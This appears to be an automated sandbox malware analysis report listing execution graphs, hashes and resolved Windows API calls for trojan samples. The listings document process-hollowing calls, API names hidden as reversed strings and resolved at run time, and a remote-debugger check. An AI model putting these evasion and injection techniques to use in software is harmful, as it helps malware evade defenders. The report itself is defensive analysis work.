                                                                                                                • Source File: 00000010.00000002.4588246412.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_dad000_TrojanAIbot.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: df041d6721da172338d0a3f871abbd1e70e06c683071765916a6ba58d08b9eb0
                                                                                                                • Instruction ID: 20b32c1992c5ffdbfff5e3804285c5d882297948128de644b91a84b11df8def1
                                                                                                                • Opcode Fuzzy Hash: df041d6721da172338d0a3f871abbd1e70e06c683071765916a6ba58d08b9eb0
                                                                                                                • Instruction Fuzzy Hash: CBF0C2710053449EF7108A15CCC4B63FF98FB82774F18C05AED490A686C3799C40CA71

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:8.7%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1349
                                                                                                                Total number of Limit Nodes:12
                                                                                                                execution_graph 28103 2ccc350 28106 2cbf7c8 28103->28106 28105 2ccc358 28107 2cbf7d0 28106->28107 28107->28107 29235 2cb88b8 28107->29235 28109 2cbf7f1 28110 2cbf7f6 28109->28110 28111 2cbf850 28110->28111 28112 2cbf87b 28111->28112 29241 2cb89d0 28112->29241 28114 2cbf88e 28115 2cbf8b4 28114->28115 28116 2cbf8df 28115->28116 28117 2cb89d0 4 API calls 28116->28117 28118 2cbf8f2 28117->28118 28119 2cbf918 28118->28119 28120 2cbf922 28119->28120 28121 2cb89d0 4 API calls 28120->28121 28122 2cbf956 28121->28122 28123 2cbf986 28122->28123 28124 2cb89d0 4 API calls 28123->28124 28125 2cbf9ba 28124->28125 28126 2cbf9ea 28125->28126 28127 2cb89d0 4 API calls 28126->28127 28128 2cbfa1e 28127->28128 28129 2cbfa3c 28128->28129 28130 2cbfa4e 28129->28130 28131 2cb89d0 4 API calls 28130->28131 28132 2cbfa82 28131->28132 28133 2cbfaa0 28132->28133 28134 2cbfad3 28133->28134 28135 2cb89d0 4 API calls 28134->28135 28136 2cbfae6 28135->28136 28137 2ccb2f8 28136->28137 28138 2cbfaf3 28136->28138 29251 2cbf744 28138->29251 28140 2cbfaf8 28140->28137 28141 2cbfb1e 28140->28141 28142 2cb89d0 4 API calls 28141->28142 28143 2cbfb27 28142->28143 28144 2cb89d0 4 API calls 28143->28144 28145 2cbfb4e 28144->28145 28146 2cb89d0 4 API calls 28145->28146 28147 2cbfb81 28146->28147 28148 2cbfbd9 28147->28148 28149 2cbfbf1 28148->28149 28150 2cb89d0 4 API calls 28149->28150 28151 2cbfbfd 28150->28151 28152 2cb89d0 4 API calls 28151->28152 28153 2cbfc30 28152->28153 28154 2cbfc40 28153->28154 28155 2cb89d0 4 API calls 28154->28155 28156 2cbfc63 28155->28156 28157 2cb89d0 4 API calls 28156->28157 28158 2cbfc96 28157->28158 28159 2cbfcf9 28158->28159 28160 2cbfd06 28159->28160 28161 2cb89d0 4 API calls 28160->28161 28162 2cbfd12 28161->28162 28163 2cbfd75 28162->28163 28164 2cb89d0 4 API calls 28163->28164 28165 2cbfd8e 28164->28165 28166 2cb89d0 4 API calls 28165->28166 28167 2cbfdc1 
28166->28167 28168 2cb89d0 4 API calls 28167->28168 28169 2cbfdf4 28168->28169 28170 2cb89d0 4 API calls 28169->28170 28171 2cbfe27 28170->28171 28172 2cbfe48 28171->28172 28173 2cbfe7f 28172->28173 28174 2cb89d0 4 API calls 28173->28174 28175 2cbfea3 28174->28175 28176 2cbfeb3 28175->28176 28177 2cb89d0 4 API calls 28176->28177 28178 2cbfed6 28177->28178 28179 2cb89d0 4 API calls 28178->28179 28180 2cbff09 28179->28180 28181 2cbff30 28180->28181 28182 2cb89d0 4 API calls 28181->28182 28183 2cbff3c 28182->28183 28184 2cbff94 28183->28184 28185 2cb89d0 4 API calls 28184->28185 28186 2cbffb8 28185->28186 28187 2cbffe4 28186->28187 28188 2cb89d0 4 API calls 28187->28188 28189 2cc0034 28188->28189 28190 2cc005b 28189->28190 28191 2cb89d0 4 API calls 28190->28191 28192 2cc0067 28191->28192 28193 2cb89d0 4 API calls 28192->28193 28194 2cc009a 28193->28194 28195 2cb89d0 4 API calls 28194->28195 28196 2cc00cd 28195->28196 28197 2cb89d0 4 API calls 28196->28197 28198 2cc0149 28197->28198 28199 2cb89d0 4 API calls 28198->28199 28200 2cc01c5 28199->28200 28201 2cb89d0 4 API calls 28200->28201 28202 2cc0241 28201->28202 28203 2cb89d0 4 API calls 28202->28203 28204 2cc02bd 28203->28204 28205 2cc02cc 28204->28205 28206 2cc0327 28205->28206 28207 2cc033f 28206->28207 28208 2cb89d0 4 API calls 28207->28208 28209 2cc0382 28208->28209 28210 2cc03a3 28209->28210 28211 2cc03bb 28210->28211 28212 2cb89d0 4 API calls 28211->28212 28213 2cc03fe 28212->28213 28214 2cc0414 28213->28214 28215 2cc0534 28214->28215 28216 2cc0427 28214->28216 28218 2cc0555 28215->28218 28217 2cc0448 28216->28217 28220 2cb89d0 4 API calls 28217->28220 28219 2cb89d0 4 API calls 28218->28219 28221 2cc05b0 28219->28221 28222 2cc04a3 28220->28222 28224 2cc05d1 28221->28224 28223 2cc04c4 28222->28223 28226 2cb89d0 4 API calls 28223->28226 28225 2cb89d0 4 API calls 28224->28225 28227 2cc051f 28225->28227 28226->28227 28228 2cc052f 28227->28228 28229 2cc066d 28228->28229 28230 2cb89d0 4 API calls 28229->28230 28231 
2cc06c8 28230->28231 28232 2cc06e9 28231->28232 28233 2cb89d0 4 API calls 28232->28233 28234 2cc0744 28233->28234 28235 2cc0751 28234->28235 28236 2cc0794 28235->28236 28237 2cc07ec 28236->28237 28238 2cc0804 28237->28238 28239 2cb89d0 4 API calls 28238->28239 28240 2cc0810 28239->28240 28241 2cc0880 28240->28241 28242 2cb89d0 4 API calls 28241->28242 28243 2cc088c 28242->28243 28244 2cc08fc 28243->28244 28245 2cb89d0 4 API calls 28244->28245 28246 2cc0908 28245->28246 28247 2cc0978 28246->28247 28248 2cb89d0 4 API calls 28247->28248 28249 2cc0984 28248->28249 28250 2cc09c5 28249->28250 28251 2cc09fc 28250->28251 28252 2cc0a07 28251->28252 28253 2cb89d0 4 API calls 28252->28253 28254 2cc0a20 28253->28254 28255 2cc0a41 28254->28255 28256 2cc0a4c 28255->28256 28257 2cc0a78 28256->28257 28258 2cc0a83 28257->28258 28259 2cb89d0 4 API calls 28258->28259 28260 2cc0a9c 28259->28260 28261 2cc0abd 28260->28261 28262 2cc0ac8 28261->28262 28263 2cc0aff 28262->28263 28264 2cb89d0 4 API calls 28263->28264 28265 2cc0b18 28264->28265 28266 2cc0b22 28265->28266 28267 2cc0b2f 28266->28267 28268 2cc12fe 28267->28268 28269 2cc0b42 28267->28269 28270 2cc132a 28268->28270 28271 2cc0b63 28269->28271 28272 2cc1337 28270->28272 28274 2cc0b9a 28271->28274 28273 2cc1356 28272->28273 28275 2cc136e 28273->28275 28276 2cc0bb2 28274->28276 28277 2cb89d0 4 API calls 28275->28277 28278 2cb89d0 4 API calls 28276->28278 28279 2cc137a 28277->28279 28280 2cc0bbe 28278->28280 28281 2cc13a6 28279->28281 28282 2cc0bdf 28280->28282 28283 2cc13b3 28281->28283 28285 2cc0c16 28282->28285 28284 2cc13d2 28283->28284 28286 2cc13ea 28284->28286 28287 2cc0c2e 28285->28287 28288 2cb89d0 4 API calls 28286->28288 28289 2cb89d0 4 API calls 28287->28289 28292 2cc13f6 28288->28292 28290 2cc0c3a 28289->28290 28291 2cc0c5b 28290->28291 28293 2cc0c66 28291->28293 28294 2cc142f 28292->28294 28296 2cc0c92 28293->28296 28295 2cc144e 28294->28295 28297 2cc1466 28295->28297 28299 2cb89d0 4 API calls 28296->28299 28298 2cb89d0 
4 API calls 28297->28298 28300 2cc1472 28298->28300 28301 2cc0cb6 28299->28301 28302 2cc1494 28300->28302 28303 2cc0cd8 28301->28303 28306 2cc14d0 28302->28306 28304 2cc0d09 28303->28304 28305 2cc0d14 28304->28305 28309 2cc0d40 28305->28309 28307 2cc14fc 28306->28307 28308 2cc1507 28307->28308 28311 2cc1514 28308->28311 28310 2cc0d58 28309->28310 28313 2cb89d0 4 API calls 28310->28313 28312 2cb89d0 4 API calls 28311->28312 28314 2cc1520 28312->28314 28315 2cc0d64 28313->28315 28317 2cc154c 28314->28317 28316 2cc0d85 28315->28316 28320 2cc0d90 28316->28320 28318 2cc1578 28317->28318 28319 2cc1583 28318->28319 28322 2cc1590 28319->28322 28321 2cc0dd4 28320->28321 28324 2cb89d0 4 API calls 28321->28324 28323 2cb89d0 4 API calls 28322->28323 28325 2cc159c 28323->28325 28326 2cc0de0 28324->28326 28328 2cc15c8 28325->28328 28327 2cc0e01 28326->28327 28329 2cc0e0c 28327->28329 28332 2cc15ff 28328->28332 28330 2cc0e43 28329->28330 28331 2cc0e50 28330->28331 28334 2cb89d0 4 API calls 28331->28334 28333 2cb89d0 4 API calls 28332->28333 28337 2cc1618 28333->28337 28335 2cc0e5c 28334->28335 28336 2cc0e71 28335->28336 28340 2cc0e84 28336->28340 28338 2cc1640 28337->28338 28339 2cc1661 28338->28339 28341 2cc1679 28339->28341 28342 2cc0ebd 28340->28342 28345 2cc16a3 28341->28345 28343 2cc0ee7 28342->28343 28344 2cc0ef4 28343->28344 28347 2cb89d0 4 API calls 28344->28347 28346 2cb89d0 4 API calls 28345->28346 28348 2cc16bc 28346->28348 28349 2cc0f00 28347->28349 28351 2cc16dd 28348->28351 28350 2cc0f39 28349->28350 28352 2cc0f63 28350->28352 28354 2cc171f 28351->28354 28353 2cc0f70 28352->28353 28356 2cb89d0 4 API calls 28353->28356 28355 2cb89d0 4 API calls 28354->28355 28357 2cc1738 28355->28357 28358 2cc0f7c 28356->28358 28359 2cc1759 28357->28359 28360 2cc0f9d 28358->28360 28362 2cc12f9 28358->28362 28361 2cc1790 28359->28361 28363 2cc0fbe 28360->28363 28364 2cc179b 28361->28364 28365 2cc2b11 28362->28365 28369 2cc0ff5 28363->28369 28366 2cc17a8 28364->28366 28371 2cc2b3b 
28365->28371 28367 2cb89d0 4 API calls 28366->28367 28368 2cc17b4 28367->28368 28374 2cc17c3 28368->28374 28370 2cc100d 28369->28370 28373 2cb89d0 4 API calls 28370->28373 28372 2cb89d0 4 API calls 28371->28372 28377 2cc2b54 28372->28377 28375 2cc1019 28373->28375 28379 2cc17fe 28374->28379 28376 2cc103a 28375->28376 28378 2cc1045 28376->28378 28382 2cc2b8d 28377->28382 28383 2cc1071 28378->28383 28380 2cc182a 28379->28380 28381 2cc1835 28380->28381 28384 2cc1842 28381->28384 28385 2cc2bc4 28382->28385 28386 2cc1089 28383->28386 28387 2cb89d0 4 API calls 28384->28387 28389 2cb89d0 4 API calls 28385->28389 28390 2cb89d0 4 API calls 28386->28390 28388 2cc184e 28387->28388 28394 2cc187a 28388->28394 28393 2cc2bd0 28389->28393 28391 2cc1095 28390->28391 28392 2cc10b6 28391->28392 28398 2cc10c1 28392->28398 28397 2cc2c09 28393->28397 28395 2cc18a6 28394->28395 28396 2cc18b1 28395->28396 28399 2cc18be 28396->28399 28402 2cc2c40 28397->28402 28400 2cc1105 28398->28400 28401 2cb89d0 4 API calls 28399->28401 28405 2cb89d0 4 API calls 28400->28405 28403 2cc18ca 28401->28403 28404 2cb89d0 4 API calls 28402->28404 28403->28362 28408 2cc18dc 28403->28408 28409 2cc2c4c 28404->28409 28406 2cc1111 28405->28406 28407 2cc1132 28406->28407 28412 2cc113d 28407->28412 28410 2cc18fd 28408->28410 28411 2cc2c78 28409->28411 28417 2cc1915 28410->28417 28413 2cc2ca4 28411->28413 28414 2cc1174 28412->28414 28415 2cc2caf 28413->28415 28416 2cc1181 28414->28416 28418 2cb89d0 4 API calls 28415->28418 28419 2cb89d0 4 API calls 28416->28419 28422 2cb89d0 4 API calls 28417->28422 28420 2cc2cc8 28418->28420 28421 2cc118d 28419->28421 28420->28137 28426 2cc2ced 28420->28426 28423 2cc11ae 28421->28423 28424 2cc1958 28422->28424 28427 2cc11b9 28423->28427 28425 2cc1979 28424->28425 28430 2cc1991 28425->28430 28431 2cc2d26 28426->28431 28428 2cc11f0 28427->28428 28429 2cb89d0 4 API calls 28428->28429 28432 2cc1209 28429->28432 28433 2cb89d0 4 API calls 28430->28433 28434 2cb89d0 4 API calls 
28431->28434 28435 2cc1213 28432->28435 28436 2cc19d4 28433->28436 28437 2cc2d69 28434->28437 28438 2cc1220 28435->28438 28439 2cc19de 28436->28439 28442 2cc2da2 28437->28442 28440 2cc129e 28438->28440 28445 2cc1a39 28439->28445 28441 2cc12b6 28440->28441 28444 2cc12d5 28441->28444 28443 2cb89d0 4 API calls 28442->28443 28448 2cc2de5 28443->28448 28446 2cc12e0 28444->28446 28447 2cc1a70 28445->28447 28450 2cb89d0 4 API calls 28446->28450 28449 2cb89d0 4 API calls 28447->28449 28453 2cc2e1e 28448->28453 28451 2cc1a7c 28449->28451 28450->28362 28452 2cc1a9d 28451->28452 28454 2cc1ab5 28452->28454 28455 2cc2e55 28453->28455 28457 2cc1ad4 28454->28457 28456 2cb89d0 4 API calls 28455->28456 28459 2cc2e61 28456->28459 28458 2cc1aec 28457->28458 28461 2cb89d0 4 API calls 28458->28461 28460 2cc2e8d 28459->28460 28464 2cc2e9a 28460->28464 28462 2cc1af8 28461->28462 28463 2cc1b19 28462->28463 28466 2cc1b31 28463->28466 28465 2cc2ec4 28464->28465 28467 2cb89d0 4 API calls 28465->28467 28469 2cc1b50 28466->28469 28468 2cc2edd 28467->28468 28471 2cc2ee7 28468->28471 28470 2cb89d0 4 API calls 28469->28470 28472 2cc1b74 28470->28472 28475 2cc2f09 28471->28475 28473 2cc1b95 28472->28473 28474 2cc1bad 28473->28474 28476 2cc1bcc 28474->28476 28477 2cc2f6c 28475->28477 28478 2cc1be4 28476->28478 28479 2cb89d0 4 API calls 28477->28479 28480 2cb89d0 4 API calls 28478->28480 28482 2cc2f85 28479->28482 28481 2cc1bf0 28480->28481 28484 2cc1c1c 28481->28484 28483 2cc2fb1 28482->28483 28485 2cc2fbe 28483->28485 28486 2cc1c48 28484->28486 28487 2cc2fdd 28485->28487 28488 2cc1c53 28486->28488 28489 2cc2fe8 28487->28489 28490 2cc1c60 28488->28490 28491 2cc2ff5 28489->28491 28493 2cb89d0 4 API calls 28490->28493 28492 2cb89d0 4 API calls 28491->28492 28498 2cc3001 28492->28498 28494 2cc1c6c 28493->28494 28495 2cc1c97 28494->28495 28496 2cc1cc3 28495->28496 28497 2cc1cd0 28496->28497 28499 2cc1cef 28497->28499 28500 2cc305a 28498->28500 28501 2cc1cfa 28499->28501 28502 2cc3091 28500->28502 28504 

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 12890 2cb7ac9 12891 2cb7a56 12890->12891 12892 2cb7a2a-2cb7a54 call 2ca4530 12891->12892 12893 2cb7a58-2cb7ac2 call 2cb798c call 2ca47ec call 2ca49a0 call 2cb81cc call 2cb8274 NtAllocateVirtualMemory call 2ca4500 12891->12893 12892->12891
                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A9F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                • API String ID: 2167126740-445027087
                                                                                                                • Opcode ID: 50af5b5dbbe4f76d754942118c7c39037276d34b8ca209a94f18f7fc5c274659
                                                                                                                • Instruction ID: 487dd44f69d4b8965a7ca238ba70fe97d7265f3d83f42a73ebaa1e1d63dce034
                                                                                                                • Opcode Fuzzy Hash: 50af5b5dbbe4f76d754942118c7c39037276d34b8ca209a94f18f7fc5c274659
                                                                                                                • Instruction Fuzzy Hash: BE117076680208BFEB25EFA4DC61EEAB7EDEF89700F415460BD01D7240D670AE08DB24

Control-flow Graph

APIs
  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A9F
Strings
Memory Dump Source
• Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ (the second string is "ZwAllocateVirtualMemory" reversed; the function resolves the API name at run time via the GetModuleHandleA/GetProcAddress subcalls above)
• API String ID: 421316089-445027087
• Opcode ID: 7e9c4ab81529a1ccad183d7a8cbd9d3c6122d00dbe6bf200e5637b0b1ba31890
• Instruction ID: d35e43cdf6519915d983e7f9901a29b4ce7696426111a01c7dc7277a1d43c370
• Opcode Fuzzy Hash: 7e9c4ab81529a1ccad183d7a8cbd9d3c6122d00dbe6bf200e5637b0b1ba31890
• Instruction Fuzzy Hash: 27115B75680209BFEB25EFA4DD61EEEB7AEEF89700F414460B900D7240D670AE14DB20

Control-flow Graph (interactive graph in the original; basic blocks and edges recovered from the page data)
• 2cb7a2c-2cb7a47 -> 2cb7a4c-2cb7a56 (call 2ca4530)
• 2cb7a4c-2cb7a56 -> 2cb7a2a (loops back to 2cb7a2c) or -> 2cb7a58-2cb7a7f (calls 2cb798c, 2ca47ec, 2ca49a0, 2cb81cc, 2cb8274)
• 2cb7a58-2cb7a7f -> 2cb7a84-2cb7ac2 (NtAllocateVirtualMemory, call 2ca4500)

APIs
  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A9F
Strings
Memory Dump Source
• Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: ntdll$yromeMlautriVetacollAwZ (the second string is "ZwAllocateVirtualMemory" reversed)
• API String ID: 421316089-445027087
• Opcode ID: 0ac21f7c044637a8f59857398534d6e7ae7a3eb62eec21104754e211ca6c078f
• Instruction ID: 84b77c6e4943d351f108c9773cee7175bc14f13f2108fb4c312efa49b46ba51b
• Opcode Fuzzy Hash: 0ac21f7c044637a8f59857398534d6e7ae7a3eb62eec21104754e211ca6c078f
• Instruction Fuzzy Hash: A3116D75680209BFEB25EFA4DD61EDEB7AEEF89700F414460B900D7240D670AE14DB20

Control-flow Graph

APIs
  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
• NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB8471
Strings
Memory Dump Source
• Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
Similarity
• API ID: AddressHandleMemoryModuleProcReadVirtual
• String ID: ntdll$yromeMlautriVdaeRtN (the second string is "NtReadVirtualMemory" reversed)
• API String ID: 2004920654-737317276
• Opcode ID: 12f669d2bc61d5b7c3110f7f602bfbbc652fc478493bc090cf1cc3486d293ac7
• Instruction ID: 9a8718512f8b517b0c54e90fba0b406d5f4d4b6984f2880420b82635de85b9a5
• Opcode Fuzzy Hash: 12f669d2bc61d5b7c3110f7f602bfbbc652fc478493bc090cf1cc3486d293ac7
• Instruction Fuzzy Hash: AE016579640208AFEB25EFA8DC61E9AB7EEFB48704F514420F904D7340D674AD10DF24

Control-flow Graph

APIs
  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
• NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB7DEC
Strings
Memory Dump Source
• Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
Similarity
• API ID: AddressHandleMemoryModuleProcVirtualWrite
• String ID: Ntdll$yromeMlautriVetirW (the second string is "WriteVirtualMemory" reversed)
• API String ID: 4260932595-3542721025
• Opcode ID: 2592f8a6a1b24e5333b5cf9db3f2ad08e08c475c17afd04e37993544ef88ff99
• Instruction ID: 78d1a974077c55c2e075d1905afcd4a12206ab91b818e76c7dec468578bff531
• Opcode Fuzzy Hash: 2592f8a6a1b24e5333b5cf9db3f2ad08e08c475c17afd04e37993544ef88ff99
• Instruction Fuzzy Hash: 3C012D7A640289AFEB25EF98DC51E9EB7EDEF89700F514460B800D7640D670AD14DB64

Control-flow Graph

APIs
  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
• NtUnmapViewOfSection.NTDLL(?,?), ref: 02CB86D5
Strings
Memory Dump Source
• Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
Similarity
• API ID: AddressHandleModuleProcSectionUnmapView
• String ID: noitceSfOweiVpamnUtN$ntdll (the first string is "NtUnmapViewOfSection" reversed)
• API String ID: 2801472262-2520021413
• Opcode ID: 7a9418b01dd617dbe218b12990fe261df4a93043dc83ccf949640be9fe1cbd81
• Instruction ID: 739748ca6199268125a6eadeeb574ff6aabdb07454edfd07f0b6b4aa2a1ffccd
• Opcode Fuzzy Hash: 7a9418b01dd617dbe218b12990fe261df4a93043dc83ccf949640be9fe1cbd81
• Instruction Fuzzy Hash: 69016D74A40208AFEB25EFB4DD61E9EB7EEEF89B14F514560B800E7640DA74AD04DA24

Control-flow Graph

APIs
  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
• NtUnmapViewOfSection.NTDLL(?,?), ref: 02CB86D5
Strings
Memory Dump Source
• Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
Similarity
• API ID: AddressHandleModuleProcSectionUnmapView
• String ID: noitceSfOweiVpamnUtN$ntdll (the first string is "NtUnmapViewOfSection" reversed)
• API String ID: 2801472262-2520021413
• Opcode ID: 1005b97fdbeb7413325a6032d6deba5ec490aa3b6a6e1067d61e308ef06e9359
• Instruction ID: bb059f94d450ff01da575111411e77965e7c9cb6c01599880433dd25e394d74e
• Opcode Fuzzy Hash: 1005b97fdbeb7413325a6032d6deba5ec490aa3b6a6e1067d61e308ef06e9359
• Instruction Fuzzy Hash: A7F04939A40209EFEB15FFB4E9509DDB7EEEF89314F5145A1A44497600DA30AE04DF10

Control-flow Graph

APIs
  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
• CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CB8814
Strings
Memory Dump Source
• Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
Similarity
• API ID: AddressCreateHandleModuleProcProcessUser
• String ID: CreateProcessAsUserW$Kernel32
• API String ID: 4105707577-2353454454
• Opcode ID: 7d6395fb8d621c3ee682f035fe96d94f4ef243f8ee8a7718d96e24be1cb092c8
• Instruction ID: b184ac1baf577caab1b03594f22592a6b9b9590eab133f6cef23aa0fa1c8e71e
• Opcode Fuzzy Hash: 7d6395fb8d621c3ee682f035fe96d94f4ef243f8ee8a7718d96e24be1cb092c8
• Instruction Fuzzy Hash: D711E2B2640248AFEB61EFA8DD91FDA77EDEF0C704F514520BA08E7200C674ED109B25

Control-flow Graph (interactive graph in the original; basic blocks and edges recovered from the page data)
• 2cbf744-2cbf75e (call 2ca668c) -> 2cbf78a-2cbf792 or -> 2cbf760-2cbf772 (call 2ca6694)
• 2cbf760-2cbf772 -> 2cbf78a-2cbf792 or -> 2cbf774-2cbf784 (CheckRemoteDebuggerPresent)
• 2cbf774-2cbf784 -> 2cbf78a-2cbf792 or -> 2cbf786 -> 2cbf78a-2cbf792

APIs
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CBF77D
Strings
Memory Dump Source
• Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID: CheckRemoteDebuggerPresent$KernelBase
• API String ID: 3662101638-539270669
• Opcode ID: d356e1df88ea7236b562fe63c2ca346a00acf93885edb1f389e2a97c88714d53
• Instruction ID: 9068f52313cf04630e4c1d7f48903d5217e9df65c7e1d7e9715cc46603e5a760
• Opcode Fuzzy Hash: d356e1df88ea7236b562fe63c2ca346a00acf93885edb1f389e2a97c88714d53
• Instruction Fuzzy Hash: 1CF0A77190424CBAEB11A6F98C887DCFBBD5F05329F2443D8B435B2AD1E7710740CA91
APIs
  • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
• FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CB83C2), ref: 02CB83A4
Strings
Memory Dump Source
• Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
Similarity
• API ID: AddressCacheFlushHandleInstructionModuleProc
• String ID: FlushInstructionCache$Kernel32
• API String ID: 2392256011-184458249
• Opcode ID: f0374d4dcd1ef4eaccc6c24b96cb1df425240d85ba9e50458366dbf101e99cc6
• Instruction ID: 067961a0e7cce3a66ec7a916f8cf384186fc55d6909c03e76ea6128a29291d8f
• Opcode Fuzzy Hash: f0374d4dcd1ef4eaccc6c24b96cb1df425240d85ba9e50458366dbf101e99cc6
• Instruction Fuzzy Hash: 7D016975784348AFEB26EFA4DC62F9AB7EEEB08B00F514460B904D6740D6B0AD149F25
APIs
• GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
Strings
Memory Dump Source
• Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
Similarity
• API ID: AddressProc
• String ID: Kernel32$sserddAcorPteG (the second string is "GetProcAddress" reversed; this is the resolver helper at 02CB8274 used by the other functions in this dump)
• API String ID: 190572456-1372893251
• Opcode ID: ed1b73c700f35fdecc1ef666008f29b0116891ea81da4e6e9f17a6fa04cd6094
• Instruction ID: b64e41fb3fd22123c87680a9d816b1db0dfcf516df3717620b9116deefb36234
• Opcode Fuzzy Hash: ed1b73c700f35fdecc1ef666008f29b0116891ea81da4e6e9f17a6fa04cd6094
• Instruction Fuzzy Hash: 17016D75A40309AFEB25EFA4DC61E9EB7EEEB48B04F514460B805D7740DA70AD04DE68
APIs
  • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
• GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
Strings
Memory Dump Source
• Source File: 00000016.00000002.2351335276.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_2ca1000_Wisrysxl.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: AeldnaHeludoMteG$KernelBASE (the first string is "GetModuleHandleA" reversed; this is the resolver helper at 02CB81CC used by the other functions in this dump)
• API String ID: 1646373207-1952140341
• Opcode ID: 07ed17d8420c9e6ebcf29ebd8cf6512b062f31e25bdd3c980be16004a988f261
